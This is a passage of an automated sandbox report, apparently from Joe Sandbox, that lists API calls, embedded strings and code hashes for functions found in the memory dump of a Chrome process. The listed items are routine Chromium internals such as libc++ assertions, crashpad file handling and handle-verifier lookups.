                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E96235, 00E96363
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E9623C, 00E9636A
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00E96170, 00E9629E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateFile
                                                    • API String ID: 823142352-1749892954
                                                    • Opcode ID: 5f4d3edb59cbae51ec960f18d8667619d669a2013eaf631b4cc014d0272c0a3f
                                                    • Instruction ID: 2113273e987198a00637efea7805eb20218f02300d3d9317853465d2d938730c
                                                    • Opcode Fuzzy Hash: 5f4d3edb59cbae51ec960f18d8667619d669a2013eaf631b4cc014d0272c0a3f
                                                    • Instruction Fuzzy Hash: 3F61D871A003289BDF10EF24DC45FAA77B9AF45714F0451AAF9087B292D7316E48CB92
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D50770
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D507E5
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,00ED1384), ref: 00D5086E
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00D5092D
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D50945
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$CurrentReleaseThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 1385397084-2888085009
                                                    • Opcode ID: 2ab0beff1033938dac5775595e4bab81fb929913ef459c898b5f1b83b1e241f0
                                                    • Instruction ID: d9634c00f966c802365dd48648e82f2e06069a40274b385d6564e023da72dc07
                                                    • Opcode Fuzzy Hash: 2ab0beff1033938dac5775595e4bab81fb929913ef459c898b5f1b83b1e241f0
                                                    • Instruction Fuzzy Hash: 9251E6B19003158FDB14DF68D885A6ABBF4FF48315F094669EC46AB352E770E908CFA1
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D540B5
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D540EF
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D54160
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D541C4
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00D5410A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value
                                                    • API String ID: 374826692-2004180939
                                                    • Opcode ID: 65d53c3f8367c88bfc8c4bf84917380f16fcfe8e5d4eab1cf1fcb15d93b7c3ab
                                                    • Instruction ID: 8f2d36760e2f0b25a68a0a4135d8e496064a673447676921205cf2afe54c0eb2
                                                    • Opcode Fuzzy Hash: 65d53c3f8367c88bfc8c4bf84917380f16fcfe8e5d4eab1cf1fcb15d93b7c3ab
                                                    • Instruction Fuzzy Hash: D4517471604344AFC718DF28D885A2AB7F5FF88305F15896DF9899B7A2D730E848CB52
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00E58A26
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E58A84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                    • String ID: %s%s %s$[%03u.%03u] $[printf format error]
                                                    • API String ID: 2172594012-104471065
                                                    • Opcode ID: 23759a88dcc45238465a212a5082dc9b72efb1aab0f37aa8afb43b7315510c6d
                                                    • Instruction ID: a565b8e6ab765448f10246e0fd6f87abb14c5c5abe5118f0188262bb952fa64a
                                                    • Opcode Fuzzy Hash: 23759a88dcc45238465a212a5082dc9b72efb1aab0f37aa8afb43b7315510c6d
                                                    • Instruction Fuzzy Hash: AB41F8F2D00340ABD704AF249C46A6BB7A9EFC4310F049A3DF959B6282EF71D5548B92
                                                    APIs
                                                    • CreateFileW.KERNEL32 ref: 00E71139
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,debug.log,00000009,?), ref: 00E71175
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E711BF
                                                    • CreateFileW.KERNEL32 ref: 00E7129B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: File$Create$CurrentDirectoryModuleName
                                                    • String ID: debug.log
                                                    • API String ID: 4120427848-600467936
                                                    • Opcode ID: 027b908d37e40054c14ac2bc867d312b24d1829302e211fb0a66674183b7029c
                                                    • Instruction ID: 016ecb31f66433cb471451482cb5b9b68a52295a5bee0796566e8837747e931e
                                                    • Opcode Fuzzy Hash: 027b908d37e40054c14ac2bc867d312b24d1829302e211fb0a66674183b7029c
                                                    • Instruction Fuzzy Hash: 9D5105706003518FD710EF69DC49B7A77E0AF84708F05929DF659BB2E2EBB09988C791
                                                    APIs
                                                    • GetLongPathNameW.KERNEL32(00D39E2B,00000000,00000000), ref: 00D66B7E
                                                    • GetLongPathNameW.KERNEL32(00D39E2B,00000000,00000000), ref: 00D66BB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath
                                                    • String ID: ..\..\base\files\file_util_win.cc$MakeLongFilePath$ScopedBlockingCall
                                                    • API String ID: 82841172-2989128051
                                                    • Opcode ID: 43a933be7f21714c0f5681ef52acbdf25a7b1e64204bd661a9e18211e6e60d2b
                                                    • Instruction ID: e4172d4a17850185f4905321ce0bf3afb4512e3db7d637634f09e691d80ae570
                                                    • Opcode Fuzzy Hash: 43a933be7f21714c0f5681ef52acbdf25a7b1e64204bd661a9e18211e6e60d2b
                                                    • Instruction Fuzzy Hash: A841F5B1A04785AFD700DF20DC4566BBBE8EFD5300F148A1EF8D4A7241E770EA4887A2
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000000,00000080,00000000), ref: 00D75B26
                                                    Strings
                                                    • CreateFile , xrefs: 00D75B78
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D75C05
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D75C0C
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D75B66
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateFile
                                                    • API String ID: 823142352-1749892954
                                                    • Opcode ID: 4674702dc51613e65a2e8288d52085103d435dea75dd0884e1400ed03ef32030
                                                    • Instruction ID: 2edc00a4a53911582d16ae0ee3089ce323f5c029d1dba70f51c5081a13f849c5
                                                    • Opcode Fuzzy Hash: 4674702dc51613e65a2e8288d52085103d435dea75dd0884e1400ed03ef32030
                                                    • Instruction Fuzzy Hash: 3F31BC70600358AFEB21EB60EC85F7A7769EB45704F0485A5F90DBB285F7709E48CB62
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00D324DD,?,?,?,?,?,?,?,?,ECFE467E), ref: 00DA8B10
                                                    • SetLastError.KERNEL32(?), ref: 00DA8B31
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00D324DD,?,?,?,?,?,?,?,?,ECFE467E), ref: 00DA8BBA
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DA8BC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1762409328-1090674830
                                                    • Opcode ID: ce892a84b526ade2c517942ab7d9d448a78fe31d94086f256e22e2bd3b55c128
                                                    • Instruction ID: dba59899ee53889f3f8586de2908d763bec55cec324b3dc1e4a578c323a43cbf
                                                    • Opcode Fuzzy Hash: ce892a84b526ade2c517942ab7d9d448a78fe31d94086f256e22e2bd3b55c128
                                                    • Instruction Fuzzy Hash: B4318EB4500344DFCB209F64D885A6ABBB1FF0A300F144469E986AB362DB30D844DBB2
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00D3D22D
                                                    • SetLastError.KERNEL32(?), ref: 00D3D24D
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00D3D2B3
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D3D2BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1762409328-1090674830
                                                    • Opcode ID: c8989cb1592dc5560a8503f85d6391468b30832b909d067056cb641c5e7b02a3
                                                    • Instruction ID: 28c3fb42d064ab5991495b203a0049ba02475ac0109af202c3a2b3317364efd6
                                                    • Opcode Fuzzy Hash: c8989cb1592dc5560a8503f85d6391468b30832b909d067056cb641c5e7b02a3
                                                    • Instruction Fuzzy Hash: 2B31E174A00345DFDB10AF64E889B6B7BB6EF0A300F140429F582AB361D631D844CFBA
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00D417F8,?,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D41947
                                                    • SetLastError.KERNEL32(?,?,?,?,?,00D417F8,?,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D41967
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00D417F8,?,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D419CD
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D419D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1762409328-1090674830
                                                    • Opcode ID: 7395768addbcad47d106a337c8375163a63a1e653b7106ac0cd88eec0fcf2dcd
                                                    • Instruction ID: e1818d9ca1ff188c6e147d22b322147159fd34ff1ee456b422f2893327a181ca
                                                    • Opcode Fuzzy Hash: 7395768addbcad47d106a337c8375163a63a1e653b7106ac0cd88eec0fcf2dcd
                                                    • Instruction Fuzzy Hash: 7331D038600345DFCB10AF64D899B6A7BF1EB09300F180819F596AB361D7319885CFB2
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?), ref: 00D3C382
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?), ref: 00D3C3A2
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?), ref: 00D3C3ED
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D3C3F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1762409328-1090674830
                                                    • Opcode ID: c07b135b381952631cf791b4e7971587baed0db9eafbd579838bd00eca5fb975
                                                    • Instruction ID: b0bbbf22f04148f7b84c4ac8db6b01c1286a1cca2f3a43ca9c47b390051a8a30
                                                    • Opcode Fuzzy Hash: c07b135b381952631cf791b4e7971587baed0db9eafbd579838bd00eca5fb975
                                                    • Instruction Fuzzy Hash: 69217C715103459FCB20AFA5EC89B2E77B5EB45301F185829F646FB261EB31A844CB72
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,ECFE467E,E0000008,?,00000000,00EC0F0F,000000FF,?,00E35FB7,?,?,00E36053,00E57B4F), ref: 00E35F2B
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E35F3D
                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00EC0F0F,000000FF,?,00E35FB7,?,?,00E36053,00E57B4F), ref: 00E35F5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 3ebc181f7b36b708e3c092af593811aa951d53580cde54c2024776cb58d6ecc5
                                                    • Instruction ID: 11c377f2e6fa2581db03a8f6707552ca07794ec12a2286a059e4c84dc384c993
                                                    • Opcode Fuzzy Hash: 3ebc181f7b36b708e3c092af593811aa951d53580cde54c2024776cb58d6ecc5
                                                    • Instruction Fuzzy Hash: B601F232A44699AFCB218F50CC08FAEBBB8FB04B14F05052DF821B6290DB749908CA80
                                                    APIs
                                                    • GetProcessId.KERNEL32(00000000,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D417B8
                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D417E3
                                                    • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,?,00D40F01), ref: 00D4181A
                                                    • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,?,00D40F01), ref: 00D41822
                                                    • GetLastError.KERNEL32(?,FFFFFFFF,00000000,?,00D40F01), ref: 00D4182A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$ErrorLastTimes
                                                    • String ID:
                                                    • API String ID: 2562579171-0
                                                    • Opcode ID: 12f712b625931c0d7614d8d6798d5747db5da644b42b86c716f082b5e98e5e34
                                                    • Instruction ID: 4f42f050f220cf8f5e615b5b85a94a712628c6cbd741cb920534342fcbc6b27d
